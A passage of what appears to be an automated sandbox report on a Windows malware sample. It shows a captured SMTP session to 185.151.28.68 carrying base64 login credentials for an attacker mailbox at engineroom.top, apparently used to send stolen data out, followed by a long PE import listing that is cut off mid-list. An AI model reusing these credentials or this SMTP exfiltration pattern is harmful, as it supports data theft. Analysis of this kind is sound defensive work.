ACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAEHLO Host\r\nEHLO Host\r\nAUTH login ZnJhbmtsb2dzQGVuZ2luZXJvb20udG9w\r\nNTY2MjIwNWFjZUFDRQ==\r\nMAIL FROM:<franklogs@engineroom.top>\r\nEHLO Host\r\nAUTH login ZnJhbmtsb2dzQGVuZ2luZXJvb20udG9w\r\nNTY2MjIwNWFjZUFDRQ==\r\nMAIL FROM:<franklogs@engineroom.top>\r\nRCPT TO:<frankjoe@engineroom.top>\r\nDATA\r\nEHLO Host\r\nAUTH login ZnJhbmtsb2dzQGVuZ2luZXJvb20udG9w\r\nNTY2MjIwNWFjZUFDRQ==\r\nMAIL FROM:<franklogs@engineroom.top>\r\nRCPT TO:<frankjoe@engineroom.top>\r\nDATA\r\n",
  567. "dst": "185.151.28.68"
  568. }
  569. ]
  570.  
  571. [*] Network Communication - Hosts: []
  572.  
  573. [*] Network Communication - IRC: []
  574.  
  575. [*] Static Analysis: {
  576. "pe": {
  577. "peid_signatures": null,
  578. "imports": [
  579. {
  580. "imports": [
  581. {
  582. "name": "DeleteCriticalSection",
  583. "address": "0x476168"
  584. },
  585. {
  586. "name": "LeaveCriticalSection",
  587. "address": "0x47616c"
  588. },
  589. {
  590. "name": "EnterCriticalSection",
  591. "address": "0x476170"
  592. },
  593. {
  594. "name": "InitializeCriticalSection",
  595. "address": "0x476174"
  596. },
  597. {
  598. "name": "VirtualFree",
  599. "address": "0x476178"
  600. },
  601. {
  602. "name": "VirtualAlloc",
  603. "address": "0x47617c"
  604. },
  605. {
  606. "name": "LocalFree",
  607. "address": "0x476180"
  608. },
  609. {
  610. "name": "LocalAlloc",
  611. "address": "0x476184"
  612. },
  613. {
  614. "name": "GetVersion",
  615. "address": "0x476188"
  616. },
  617. {
  618. "name": "GetCurrentThreadId",
  619. "address": "0x47618c"
  620. },
  621. {
  622. "name": "InterlockedDecrement",
  623. "address": "0x476190"
  624. },
  625. {
  626. "name": "InterlockedIncrement",
  627. "address": "0x476194"
  628. },
  629. {
  630. "name": "VirtualQuery",
  631. "address": "0x476198"
  632. },
  633. {
  634. "name": "WideCharToMultiByte",
  635. "address": "0x47619c"
  636. },
  637. {
  638. "name": "MultiByteToWideChar",
  639. "address": "0x4761a0"
  640. },
  641. {
  642. "name": "lstrlenA",
  643. "address": "0x4761a4"
  644. },
  645. {
  646. "name": "lstrcpynA",
  647. "address": "0x4761a8"
  648. },
  649. {
  650. "name": "LoadLibraryExA",
  651. "address": "0x4761ac"
  652. },
  653. {
  654. "name": "GetThreadLocale",
  655. "address": "0x4761b0"
  656. },
  657. {
  658. "name": "GetStartupInfoA",
  659. "address": "0x4761b4"
  660. },
  661. {
  662. "name": "GetProcAddress",
  663. "address": "0x4761b8"
  664. },
  665. {
  666. "name": "GetModuleHandleA",
  667. "address": "0x4761bc"
  668. },
  669. {
  670. "name": "GetModuleFileNameA",
  671. "address": "0x4761c0"
  672. },
  673. {
  674. "name": "GetLocaleInfoA",
  675. "address": "0x4761c4"
  676. },
  677. {
  678. "name": "GetCommandLineA",
  679. "address": "0x4761c8"
  680. },
  681. {
  682. "name": "FreeLibrary",
  683. "address": "0x4761cc"
  684. },
  685. {
  686. "name": "FindFirstFileA",
  687. "address": "0x4761d0"
  688. },
  689. {
  690. "name": "FindClose",
  691. "address": "0x4761d4"
  692. },
  693. {
  694. "name": "ExitProcess",
  695. "address": "0x4761d8"
  696. },
  697. {
  698. "name": "ExitThread",
  699. "address": "0x4761dc"
  700. },
  701. {
  702. "name": "CreateThread",
  703. "address": "0x4761e0"
  704. },
  705. {
  706. "name": "WriteFile",
  707. "address": "0x4761e4"
  708. },
  709. {
  710. "name": "UnhandledExceptionFilter",
  711. "address": "0x4761e8"
  712. },
  713. {
  714. "name": "RtlUnwind",
  715. "address": "0x4761ec"
  716. },
  717. {
  718. "name": "RaiseException",
  719. "address": "0x4761f0"
  720. },
  721. {
  722. "name": "GetStdHandle",
  723. "address": "0x4761f4"
  724. }
  725. ],
  726. "dll": "kernel32.dll"
  727. },
  728. {
  729. "imports": [
  730. {
  731. "name": "GetKeyboardType",
  732. "address": "0x4761fc"
  733. },
  734. {
  735. "name": "LoadStringA",
  736. "address": "0x476200"
  737. },
  738. {
  739. "name": "MessageBoxA",
  740. "address": "0x476204"
  741. },
  742. {
  743. "name": "CharNextA",
  744. "address": "0x476208"
  745. }
  746. ],
  747. "dll": "user32.dll"
  748. },
  749. {
  750. "imports": [
  751. {
  752. "name": "RegQueryValueExA",
  753. "address": "0x476210"
  754. },
  755. {
  756. "name": "RegOpenKeyExA",
  757. "address": "0x476214"
  758. },
  759. {
  760. "name": "RegCloseKey",
  761. "address": "0x476218"
  762. }
  763. ],
  764. "dll": "advapi32.dll"
  765. },
  766. {
  767. "imports": [
  768. {
  769. "name": "SysFreeString",
  770. "address": "0x476220"
  771. },
  772. {
  773. "name": "SysReAllocStringLen",
  774. "address": "0x476224"
  775. },
  776. {
  777. "name": "SysAllocStringLen",
  778. "address": "0x476228"
  779. }
  780. ],
  781. "dll": "oleaut32.dll"
  782. },
  783. {
  784. "imports": [
  785. {
  786. "name": "TlsSetValue",
  787. "address": "0x476230"
  788. },
  789. {
  790. "name": "TlsGetValue",
  791. "address": "0x476234"
  792. },
  793. {
  794. "name": "LocalAlloc",
  795. "address": "0x476238"
  796. },
  797. {
  798. "name": "GetModuleHandleA",
  799. "address": "0x47623c"
  800. }
  801. ],
  802. "dll": "kernel32.dll"
  803. },
  804. {
  805. "imports": [
  806. {
  807. "name": "RegQueryValueExA",
  808. "address": "0x476244"
  809. },
  810. {
  811. "name": "RegOpenKeyExA",
  812. "address": "0x476248"
  813. },
  814. {
  815. "name": "RegCloseKey",
  816. "address": "0x47624c"
  817. }
  818. ],
  819. "dll": "advapi32.dll"
  820. },
  821. {
  822. "imports": [
  823. {
  824. "name": "lstrcpyA",
  825. "address": "0x476254"
  826. },
  827. {
  828. "name": "WriteFile",
  829. "address": "0x476258"
  830. },
  831. {
  832. "name": "WaitForSingleObject",
  833. "address": "0x47625c"
  834. },
  835. {
  836. "name": "VirtualQuery",
  837. "address": "0x476260"
  838. },
  839. {
  840. "name": "VirtualAlloc",
  841. "address": "0x476264"
  842. },
  843. {
  844. "name": "SuspendThread",
  845. "address": "0x476268"
  846. },
  847. {
  848. "name": "Sleep",
  849. "address": "0x47626c"
  850. },
  851. {
  852. "name": "SizeofResource",
  853. "address": "0x476270"
  854. },
  855. {
  856. "name": "SetThreadPriority",
  857. "address": "0x476274"
  858. },
  859. {
  860. "name": "SetThreadLocale",
  861. "address": "0x476278"
  862. },
  863. {
  864. "name": "SetFilePointer",
  865. "address": "0x47627c"
  866. },
  867. {
  868. "name": "SetEvent",
  869. "address": "0x476280"
  870. },
  871. {
  872. "name": "SetErrorMode",
  873. "address": "0x476284"
  874. },
  875. {
  876. "name": "SetEndOfFile",
  877. "address": "0x476288"
  878. },
  879. {
  880. "name": "ResumeThread",
  881. "address": "0x47628c"
  882. },
  883. {
  884. "name": "ResetEvent",
  885. "address": "0x476290"
  886. },
  887. {
  888. "name": "ReadFile",
  889. "address": "0x476294"
  890. },
  891. {
  892. "name": "MultiByteToWideChar",
  893. "address": "0x476298"
  894. },
  895. {
  896. "name": "MulDiv",
  897. "address": "0x47629c"
  898. },
  899. {
  900. "name": "LockResource",
  901. "address": "0x4762a0"
  902. },
  903. {
  904. "name": "LoadResource",
  905. "address": "0x4762a4"
  906. },
  907. {
  908. "name": "LoadLibraryA",
  909. "address": "0x4762a8"
  910. },
  911. {
  912. "name": "LeaveCriticalSection",
  913. "address": "0x4762ac"
  914. },
  915. {
  916. "name": "InitializeCriticalSection",
  917. "address": "0x4762b0"
  918. },
  919. {
  920. "name": "GlobalUnlock",
  921. "address": "0x4762b4"
  922. },
  923. {
  924. "name": "GlobalSize",
  925. "address": "0x4762b8"
  926. },
  927. {
  928. "name": "GlobalReAlloc",
  929. "address": "0x4762bc"
  930. },
  931. {
  932. "name": "GlobalHandle",
  933. "address": "0x4762c0"
  934. },
  935. {
  936. "name": "GlobalLock",
  937. "address": "0x4762c4"
  938. },
  939. {
  940. "name": "GlobalFree",
  941. "address": "0x4762c8"
  942. },
  943. {
  944. "name": "GlobalFindAtomA",
  945. "address": "0x4762cc"
  946. },
  947. {
  948. "name": "GlobalDeleteAtom",
  949. "address": "0x4762d0"
  950. },
  951. {
  952. "name": "GlobalAlloc",
  953. "address": "0x4762d4"
  954. },
  955. {
  956. "name": "GlobalAddAtomA",
  957. "address": "0x4762d8"
  958. },
  959. {
  960. "name": "GetVersionExA",
  961. "address": "0x4762dc"
  962. },
  963. {
  964. "name": "GetVersion",
  965. "address": "0x4762e0"
  966. },
  967. {
  968. "name": "GetUserDefaultLCID",
  969. "address": "0x4762e4"
  970. },
  971. {
  972. "name": "GetTickCount",
  973. "address": "0x4762e8"
  974. },
  975. {
  976. "name": "GetThreadLocale",
  977. "address": "0x4762ec"
  978. },
  979. {
  980. "name": "GetTempPathA",
  981. "address": "0x4762f0"
  982. },
  983. {
  984. "name": "GetSystemInfo",
  985. "address": "0x4762f4"
  986. },
  987. {
  988. "name": "GetStringTypeExA",
  989. "address": "0x4762f8"
  990. },
  991. {
  992. "name": "GetStdHandle",
  993. "address": "0x4762fc"
  994. },
  995. {
  996. "name": "GetProfileStringA",
  997. "address": "0x476300"
  998. },
  999. {
  1000. "name": "GetProcAddress",
  1001. "address": "0x476304"
  1002. },
  1003. {
  1004. "name": "GetModuleHandleA",
  1005. "address": "0x476308"
  1006. },
  1007. {
  1008. "name": "GetModuleFileNameA",
  1009. "address": "0x47630c"
  1010. },
  1011. {
  1012. "name": "GetLocaleInfoA",
  1013. "address": "0x476310"
  1014. },
  1015. {
  1016. "name": "GetLocalTime",
  1017. "address": "0x476314"
  1018. },
  1019. {
  1020. "name": "GetLastError",
  1021. "address": "0x476318"
  1022. },
  1023. {
  1024. "name": "GetFullPathNameA",
  1025. "address": "0x47631c"
  1026. },
  1027. {
  1028. "name": "GetFileSize",
  1029. "address": "0x476320"
  1030. },
  1031. {
  1032. "name": "GetExitCodeThread",
  1033. "address": "0x476324"
  1034. },
  1035. {
  1036. "name": "GetDiskFreeSpaceA",
  1037. "address": "0x476328"
  1038. },
  1039. {
  1040. "name": "GetDateFormatA",
  1041. "address": "0x47632c"
  1042. },
  1043. {
  1044. "name": "GetCurrentThreadId",
  1045. "address": "0x476330"
  1046. },
  1047. {
  1048. "name": "GetCurrentProcessId",
  1049. "address": "0x476334"
  1050. },
  1051. {
  1052. "name": "GetCPInfo",
  1053. "address": "0x476338"
  1054. },
  1055. {
  1056. "name": "GetACP",
  1057. "address": "0x47633c"
  1058. },
  1059. {
  1060. "name": "FreeResource",
  1061. "address": "0x476340"
  1062. },
  1063. {
  1064. "name": "InterlockedIncrement",
  1065. "address": "0x476344"
  1066. },
  1067. {
  1068. "name": "InterlockedExchange",
  1069. "address": "0x476348"
  1070. },
  1071. {
  1072. "name": "InterlockedDecrement",
  1073. "address": "0x47634c"
  1074. },
  1075. {
  1076. "name": "FreeLibrary",
  1077. "address": "0x476350"
  1078. },
  1079. {
  1080. "name": "FormatMessageA",
  1081. "address": "0x476354"
  1082. },
  1083. {
  1084. "name": "FindResourceA",
  1085. "address": "0x476358"
  1086. },
  1087. {
  1088. "name": "FindFirstFileA",
  1089. "address": "0x47635c"
  1090. },
  1091. {
  1092. "name": "FindClose",
  1093. "address": "0x476360"
  1094. },
  1095. {
  1096. "name": "FileTimeToLocalFileTime",
  1097. "address": "0x476364"
  1098. },
  1099. {
  1100. "name": "FileTimeToDosDateTime",
  1101. "address": "0x476368"
  1102. },
  1103. {
  1104. "name": "EnumCalendarInfoA",
  1105. "address": "0x47636c"
  1106. },
  1107. {
  1108. "name": "EnterCriticalSection",
  1109. "address": "0x476370"
  1110. },
  1111. {
  1112. "name": "DeleteCriticalSection",
  1113. "address": "0x476374"
  1114. },
  1115. {
  1116. "name": "CreateThread",
  1117. "address": "0x476378"
  1118. },
  1119. {
  1120. "name": "CreateFileA",
  1121. "address": "0x47637c"
  1122. },
  1123. {
  1124. "name": "CreateEventA",
  1125. "address": "0x476380"
  1126. },
  1127. {
  1128. "name": "CompareStringA",
  1129. "address": "0x476384"
  1130. },
  1131. {
  1132. "name": "CloseHandle",
  1133. "address": "0x476388"
  1134. }
  1135. ],
  1136. "dll": "kernel32.dll"
  1137. },
  1138. {
  1139. "imports": [
  1140. {
  1141. "name": "VerQueryValueA",
  1142. "address": "0x476390"
  1143. },
  1144. {
  1145. "name": "GetFileVersionInfoSizeA",
  1146. "address": "0x476394"
  1147. },
  1148. {
  1149. "name": "GetFileVersionInfoA",
  1150. "address": "0x476398"
  1151. }
  1152. ],
  1153. "dll": "version.dll"
  1154. },
  1155. {
  1156. "imports": [
  1157. {
  1158. "name": "UnrealizeObject",
  1159. "address": "0x4763a0"
  1160. },
  1161. {
  1162. "name": "StretchBlt",
  1163. "address": "0x4763a4"
  1164. },
  1165. {
  1166. "name": "SetWindowOrgEx",
  1167. "address": "0x4763a8"
  1168. },
  1169. {
  1170. "name": "SetWinMetaFileBits",
  1171. "address": "0x4763ac"
  1172. },
  1173. {
  1174. "name": "SetViewportOrgEx",
  1175. "address": "0x4763b0"
  1176. },
  1177. {
  1178. "name": "SetTextColor",
  1179. "address": "0x4763b4"
  1180. },
  1181. {
  1182. "name": "SetStretchBltMode",
  1183. "address": "0x4763b8"
  1184. },
  1185. {
  1186. "name": "SetROP2",
  1187. "address": "0x4763bc"
  1188. },
  1189. {
  1190. "name": "SetPixel",
  1191. "address": "0x4763c0"
  1192. },
  1193. {
  1194. "name": "SetMapMode",
  1195. "address": "0x4763c4"
  1196. },
  1197. {
  1198. "name": "SetEnhMetaFileBits",
  1199. "address": "0x4763c8"
  1200. },
  1201. {
  1202. "name": "SetDIBColorTable",
  1203. "address": "0x4763cc"
  1204. },
  1205. {
  1206. "name": "SetBrushOrgEx",
  1207. "address": "0x4763d0"
  1208. },
  1209. {
  1210. "name": "SetBkMode",
  1211. "address": "0x4763d4"
  1212. },
  1213. {
  1214. "name": "SetBkColor",
  1215. "address": "0x4763d8"
  1216. },
  1217. {
  1218. "name": "SelectPalette",
  1219. "address": "0x4763dc"
  1220. },
  1221. {
  1222. "name": "SelectObject",
  1223. "address": "0x4763e0"
  1224. },
  1225. {
  1226. "name": "ScaleWindowExtEx",
  1227. "address": "0x4763e4"
  1228. },
  1229. {
  1230. "name": "SaveDC",
  1231. "address": "0x4763e8"
  1232. },
  1233. {
  1234. "name": "RestoreDC",
  1235. "address": "0x4763ec"
  1236. },
  1237. {
  1238. "name": "RectVisible",
  1239. "address": "0x4763f0"
  1240. },
  1241. {
  1242. "name": "RealizePalette",
  1243. "address": "0x4763f4"
  1244. },
  1245. {
  1246. "name": "PlayEnhMetaFile",
  1247. "address": "0x4763f8"
  1248. },
  1249. {
  1250. "name": "PatBlt",
  1251. "address": "0x4763fc"
  1252. },
  1253. {
  1254. "name": "MoveToEx",
  1255. "address": "0x476400"
  1256. },
  1257. {
  1258. "name": "MaskBlt",
  1259. "address": "0x476404"
  1260. },
  1261. {
  1262. "name": "LineTo",
  1263. "address": "0x476408"
  1264. },
  1265. {
  1266. "name": "LPtoDP",
  1267. "address": "0x47640c"
  1268. },
  1269. {
  1270. "name": "IntersectClipRect",
  1271. "address": "0x476410"
  1272. },
  1273. {
  1274. "name": "GetWindowOrgEx",
  1275. "address": "0x476414"
  1276. },
  1277. {
  1278. "name": "GetWinMetaFileBits",
  1279. "address": "0x476418"
  1280. },
  1281. {
  1282. "name": "GetTextMetricsA",
  1283. "address": "0x47641c"
  1284. },
  1285. {
  1286. "name": "GetTextExtentPoint32A",
  1287. "address": "0x476420"
  1288. },
  1289. {
  1290. "name": "GetSystemPaletteEntries",
  1291. "address": "0x476424"
  1292. },
  1293. {
  1294. "name": "GetStockObject",
  1295. "address": "0x476428"
  1296. },
  1297. {
  1298. "name": "GetPixel",
  1299. "address": "0x47642c"
  1300. },
  1301. {
  1302. "name": "GetPaletteEntries",
  1303. "address": "0x476430"
  1304. },
  1305. {
  1306. "name": "GetObjectA",
  1307. "address": "0x476434"
  1308. },
  1309. {
  1310. "name": "GetEnhMetaFilePaletteEntries",
  1311. "address": "0x476438"
  1312. },
  1313. {
  1314. "name": "GetEnhMetaFileHeader",
  1315. "address": "0x47643c"
  1316. },
  1317. {
  1318. "name": "GetEnhMetaFileDescriptionA",
  1319. "address": "0x476440"
  1320. },
  1321. {
  1322. "name": "GetEnhMetaFileBits",
  1323. "address": "0x476444"
  1324. },
  1325. {
  1326. "name": "GetDeviceCaps",
  1327. "address": "0x476448"
  1328. },
  1329. {
  1330. "name": "GetDIBits",
  1331. "address": "0x47644c"
  1332. },
  1333. {
  1334. "name": "GetDIBColorTable",
  1335. "address": "0x476450"
  1336. },
  1337. {
  1338. "name": "GetDCOrgEx",
  1339. "address": "0x476454"
  1340. },
  1341. {
  1342. "name": "GetCurrentPositionEx",
  1343. "address": "0x476458"
  1344. },
  1345. {
  1346. "name": "GetClipBox",
  1347. "address": "0x47645c"
  1348. },
  1349. {
  1350. "name": "GetBrushOrgEx",
  1351. "address": "0x476460"
  1352. },
  1353. {
  1354. "name": "GetBitmapBits",
  1355. "address": "0x476464"
  1356. },
  1357. {
  1358. "name": "ExcludeClipRect",
  1359. "address": "0x476468"
  1360. },
  1361. {
  1362. "name": "EndPage",
  1363. "address": "0x47646c"
  1364. },
  1365. {
  1366. "name": "EndDoc",
  1367. "address": "0x476470"
  1368. },
  1369. {
  1370. "name": "DeleteObject",
  1371. "address": "0x476474"
  1372. },
  1373. {
  1374. "name": "DeleteEnhMetaFile",
  1375. "address": "0x476478"
  1376. },
  1377. {
  1378. "name": "DeleteDC",
  1379. "address": "0x47647c"
  1380. },
  1381. {
  1382. "name": "CreateSolidBrush",
  1383. "address": "0x476480"
  1384. },
  1385. {
  1386. "name": "CreatePenIndirect",
  1387. "address": "0x476484"
  1388. },
  1389. {
  1390. "name": "CreatePalette",
  1391. "address": "0x476488"
  1392. },
  1393. {
  1394. "name": "CreateICA",
  1395. "address": "0x47648c"
  1396. },
  1397. {
  1398. "name": "CreateHalftonePalette",
  1399. "address": "0x476490"
  1400. },
  1401. {
  1402. "name": "CreateFontIndirectA",
  1403. "address": "0x476494"
  1404. },
  1405. {
  1406. "name": "CreateEnhMetaFileA",
  1407. "address": "0x476498"
  1408. },
  1409. {
  1410. "name": "CreateDIBitmap",
  1411. "address": "0x47649c"
  1412. },
  1413. {
  1414. "name": "CreateDIBSection",
  1415. "address": "0x4764a0"
  1416. },
  1417. {
  1418. "name": "CreateDCA",
  1419. "address": "0x4764a4"
  1420. },
  1421. {
  1422. "name": "CreateCompatibleDC",
  1423. "address": "0x4764a8"
  1424. },
  1425. {
  1426. "name": "CreateCompatibleBitmap",
  1427. "address": "0x4764ac"
  1428. },
  1429. {
  1430. "name": "CreateBrushIndirect",
  1431. "address": "0x4764b0"
  1432. },
  1433. {
  1434. "name": "CreateBitmap",
  1435. "address": "0x4764b4"
  1436. },
  1437. {
  1438. "name": "CopyEnhMetaFileA",
  1439. "address": "0x4764b8"
  1440. },
  1441. {
  1442. "name": "CloseEnhMetaFile",
  1443. "address": "0x4764bc"
  1444. },
  1445. {
  1446. "name": "BitBlt",
  1447. "address": "0x4764c0"
  1448. }
  1449. ],
  1450. "dll": "gdi32.dll"
  1451. },
  1452. {
  1453. "imports": [
  1454. {
  1455. "name": "CreateWindowExA",
  1456. "address": "0x4764c8"
  1457. },
  1458. {
  1459. "name": "WindowFromPoint",
  1460. "address": "0x4764cc"
  1461. },
  1462. {
  1463. "name": "WinHelpA",
  1464. "address": "0x4764d0"
  1465. },
  1466. {
  1467. "name": "WaitMessage",
  1468. "address": "0x4764d4"
  1469. },
  1470. {
  1471. "name": "UpdateWindow",
  1472. "address": "0x4764d8"
  1473. },
  1474. {
  1475. "name": "UnregisterClassA",
  1476. "address": "0x4764dc"
  1477. },
  1478. {
  1479. "name": "UnhookWindowsHookEx",
  1480. "address": "0x4764e0"
  1481. },
  1482. {
  1483. "name": "TranslateMessage",
  1484. "address": "0x4764e4"
  1485. },
  1486. {
  1487. "name": "TranslateMDISysAccel",
  1488. "address": "0x4764e8"
  1489. },
  1490. {
  1491. "name": "TrackPopupMenu",
  1492. "address": "0x4764ec"
  1493. },
  1494. {
  1495. "name": "SystemParametersInfoA",
  1496. "address": "0x4764f0"
  1497. },
  1498. {
  1499. "name": "ShowWindow",
  1500. "address": "0x4764f4"
  1501. },
  1502. {
  1503. "name": "ShowScrollBar",
  1504. "address": "0x4764f8"
  1505. },
  1506. {
  1507. "name": "ShowOwnedPopups",
  1508. "address": "0x4764fc"
  1509. },
  1510. {
  1511. "name": "ShowCursor",
  1512. "address": "0x476500"
  1513. },
  1514. {
  1515. "name": "SetWindowsHookExA",
  1516. "address": "0x476504"
  1517. },
  1518. {
  1519. "name": "SetWindowPos",
  1520. "address": "0x476508"
  1521. },
  1522. {
  1523. "name": "SetWindowPlacement",
  1524. "address": "0x47650c"
  1525. },
  1526. {
  1527. "name": "SetWindowLongA",
  1528. "address": "0x476510"
  1529. },
  1530. {
  1531. "name": "SetTimer",
  1532. "address": "0x476514"
  1533. },
  1534. {
  1535. "name": "SetScrollRange",
  1536. "address": "0x476518"
  1537. },
  1538. {
  1539. "name": "SetScrollPos",
  1540. "address": "0x47651c"
  1541. },
  1542. {
  1543. "name": "SetScrollInfo",
  1544. "address": "0x476520"
  1545. },
  1546. {
  1547. "name": "SetRect",
  1548. "address": "0x476524"
  1549. },
  1550. {
  1551. "name": "SetPropA",
  1552. "address": "0x476528"
  1553. },
  1554. {
  1555. "name": "SetParent",
  1556. "address": "0x47652c"
  1557. },
  1558. {
  1559. "name": "SetMenuItemInfoA",
  1560. "address": "0x476530"
  1561. },
  1562. {
  1563. "name": "SetMenu",
  1564. "address": "0x476534"
  1565. },
  1566. {
  1567. "name": "SetForegroundWindow",
  1568. "address": "0x476538"
  1569. },
  1570. {
  1571. "name": "SetFocus",
  1572. "address": "0x47653c"
  1573. },
  1574. {
  1575. "name": "SetCursor",
  1576. "address": "0x476540"
  1577. },
  1578. {
  1579. "name": "SetClassLongA",
  1580. "address": "0x476544"
  1581. },
  1582. {
  1583. "name": "SetCapture",
  1584. "address": "0x476548"
  1585. },
  1586. {
  1587. "name": "SetActiveWindow",
  1588. "address": "0x47654c"
  1589. },
  1590. {
  1591. "name": "SendMessageA",
  1592. "address": "0x476550"
  1593. },
  1594. {
  1595. "name": "ScrollWindow",
  1596. "address": "0x476554"
  1597. },
  1598. {
  1599. "name": "ScreenToClient",
  1600. "address": "0x476558"
  1601. },
  1602. {
  1603. "name": "RemovePropA",
  1604. "address": "0x47655c"
  1605. },
  1606. {
  1607. "name": "RemoveMenu",
  1608. "address": "0x476560"
  1609. },
  1610. {
  1611. "name": "ReleaseDC",
  1612. "address": "0x476564"
  1613. },
  1614. {
  1615. "name": "ReleaseCapture",
  1616. "address": "0x476568"
  1617. },
  1618. {
  1619. "name": "RegisterWindowMessageA",
  1620. "address": "0x47656c"
  1621. },
  1622. {
  1623. "name": "RegisterClipboardFormatA",
  1624. "address": "0x476570"
  1625. },
  1626. {
  1627. "name": "RegisterClassA",
  1628. "address": "0x476574"
  1629. },
  1630. {
  1631. "name": "RedrawWindow",
  1632. "address": "0x476578"
  1633. },
  1634. {
  1635. "name": "PtInRect",
  1636. "address": "0x47657c"
  1637. },
  1638. {
  1639. "name": "PostQuitMessage",
  1640. "address": "0x476580"
  1641. },
  1642. {
  1643. "name": "PostMessageA",
  1644. "address": "0x476584"
  1645. },
  1646. {
  1647. "name": "PeekMessageA",
  1648. "address": "0x476588"
  1649. },
  1650. {
  1651. "name": "OffsetRect",
  1652. "address": "0x47658c"
  1653. },
  1654. {
  1655. "name": "OemToCharA",
  1656. "address": "0x476590"
  1657. },
  1658. {
  1659. "name": "MsgWaitForMultipleObjects",
  1660. "address": "0x476594"
  1661. },
  1662. {
  1663. "name": "MessageBoxA",
  1664. "address": "0x476598"
  1665. },
  1666. {
  1667. "name": "MapWindowPoints",
  1668. "address": "0x47659c"
  1669. },
  1670. {
  1671. "name": "MapVirtualKeyA",
  1672. "address": "0x4765a0"
  1673. },
  1674. {
  1675. "name": "LoadStringA",
  1676. "address": "0x4765a4"
  1677. },
  1678. {
  1679. "name": "LoadKeyboardLayoutA",
  1680. "address": "0x4765a8"
  1681. },
  1682. {
  1683. "name": "LoadIconA",
  1684. "address": "0x4765ac"
  1685. },
  1686. {
  1687. "name": "LoadCursorA",
  1688. "address": "0x4765b0"
  1689. },
  1690. {
  1691. "name": "LoadBitmapA",
  1692. "address": "0x4765b4"
  1693. },
  1694. {
  1695. "name": "KillTimer",
  1696. "address": "0x4765b8"
  1697. },
  1698. {
  1699. "name": "IsZoomed",
  1700. "address": "0x4765bc"
  1701. },
  1702. {
  1703. "name": "IsWindowVisible",
  1704. "address": "0x4765c0"
  1705. },
  1706. {
  1707. "name": "IsWindowEnabled",
  1708. "address": "0x4765c4"
  1709. },
  1710. {
  1711. "name": "IsWindow",
  1712. "address": "0x4765c8"
  1713. },
  1714. {
  1715. "name": "IsRectEmpty",
  1716. "address": "0x4765cc"
  1717. },
  1718. {
  1719. "name": "IsIconic",
  1720. "address": "0x4765d0"
  1721. },
  1722. {
  1723. "name": "IsDialogMessageA",
  1724. "address": "0x4765d4"
  1725. },
  1726. {
  1727. "name": "IsChild",
  1728. "address": "0x4765d8"
  1729. },
  1730. {
  1731. "name": "InvalidateRect",
  1732. "address": "0x4765dc"
  1733. },
  1734. {
  1735. "name": "IntersectRect",
  1736. "address": "0x4765e0"
  1737. },
  1738. {
  1739. "name": "InsertMenuItemA",
  1740. "address": "0x4765e4"
  1741. },
  1742. {
  1743. "name": "InsertMenuA",
  1744. "address": "0x4765e8"
  1745. },
  1746. {
  1747. "name": "InflateRect",
  1748. "address": "0x4765ec"
  1749. },
  1750. {
  1751. "name": "GetWindowThreadProcessId",
  1752. "address": "0x4765f0"
  1753. },
  1754. {
  1755. "name": "GetWindowTextA",
  1756. "address": "0x4765f4"
  1757. },
  1758. {
  1759. "name": "GetWindowRect",
  1760. "address": "0x4765f8"
  1761. },
  1762. {
  1763. "name": "GetWindowPlacement",
  1764. "address": "0x4765fc"
  1765. },
  1766. {
  1767. "name": "GetWindowLongA",
  1768. "address": "0x476600"
  1769. },
  1770. {
  1771. "name": "GetWindowDC",
  1772. "address": "0x476604"
  1773. },
  1774. {
  1775. "name": "GetTopWindow",
  1776. "address": "0x476608"
  1777. },
  1778. {
  1779. "name": "GetSystemMetrics",
  1780. "address": "0x47660c"
  1781. },
  1782. {
  1783. "name": "GetSystemMenu",
  1784. "address": "0x476610"
  1785. },
  1786. {
  1787. "name": "GetSysColorBrush",
  1788. "address": "0x476614"
  1789. },
  1790. {
  1791. "name": "GetSysColor",
  1792. "address": "0x476618"
  1793. },
  1794. {
  1795. "name": "GetSubMenu",
  1796. "address": "0x47661c"
  1797. },
  1798. {
  1799. "name": "GetScrollRange",
  1800. "address": "0x476620"
  1801. },
  1802. {
  1803. "name": "GetScrollPos",
  1804. "address": "0x476624"
  1805. },
  1806. {
  1807. "name": "GetScrollInfo",
  1808. "address": "0x476628"
  1809. },
  1810. {
  1811. "name": "GetPropA",
  1812. "address": "0x47662c"
  1813. },
  1814. {
  1815. "name": "GetParent",
  1816. "address": "0x476630"
  1817. },
  1818. {
  1819. "name": "GetWindow",
  1820. "address": "0x476634"
  1821. },
  1822. {
  1823. "name": "GetMessageTime",
  1824. "address": "0x476638"
  1825. },
  1826. {
  1827. "name": "GetMenuStringA",
  1828. "address": "0x47663c"
  1829. },
  1830. {
  1831. "name": "GetMenuState",
  1832. "address": "0x476640"
  1833. },
  1834. {
  1835. "name": "GetMenuItemInfoA",
  1836. "address": "0x476644"
  1837. },
  1838. {
  1839. "name": "GetMenuItemID",
  1840. "address": "0x476648"
  1841. },
  1842. {
  1843. "name": "GetMenuItemCount",
  1844. "address": "0x47664c"
  1845. },
  1846. {
  1847. "name": "GetMenu",
  1848. "address": "0x476650"
  1849. },
  1850. {
  1851. "name": "GetLastActivePopup",
  1852. "address": "0x476654"
  1853. },
  1854. {
  1855. "name": "GetKeyboardState",
  1856. "address": "0x476658"
  1857. },
  1858. {
  1859. "name": "GetKeyboardLayoutList",
  1860. "address": "0x47665c"
  1861. },
  1862. {
  1863. "name": "GetKeyboardLayout",
  1864. "address": "0x476660"
  1865. },
  1866. {
  1867. "name": "GetKeyState",
  1868. "address": "0x476664"
  1869. },
  1870. {
  1871. "name": "GetKeyNameTextA",
  1872. "address": "0x476668"
  1873. },
  1874. {
  1875. "name": "GetIconInfo",
  1876. "address": "0x47666c"
  1877. },
  1878. {
  1879. "name": "GetForegroundWindow",
  1880. "address": "0x476670"
  1881. },
  1882. {
  1883. "name": "GetFocus",
  1884. "address": "0x476674"
  1885. },
  1886. {
  1887. "name": "GetDesktopWindow",
  1888. "address": "0x476678"
  1889. },
  1890. {
  1891. "name": "GetDCEx",
  1892. "address": "0x47667c"
  1893. },
  1894. {
  1895. "name": "GetDC",
  1896. "address": "0x476680"
  1897. },
  1898. {
  1899. "name": "GetCursorPos",
  1900. "address": "0x476684"
  1901. },
  1902. {
  1903. "name": "GetCursor",
  1904. "address": "0x476688"
  1905. },
  1906. {
  1907. "name": "GetClipboardData",
  1908. "address": "0x47668c"
  1909. },
  1910. {
  1911. "name": "GetClientRect",
  1912. "address": "0x476690"
  1913. },
  1914. {
  1915. "name": "GetClassNameA",
  1916. "address": "0x476694"
  1917. },
  1918. {
  1919. "name": "GetClassInfoA",
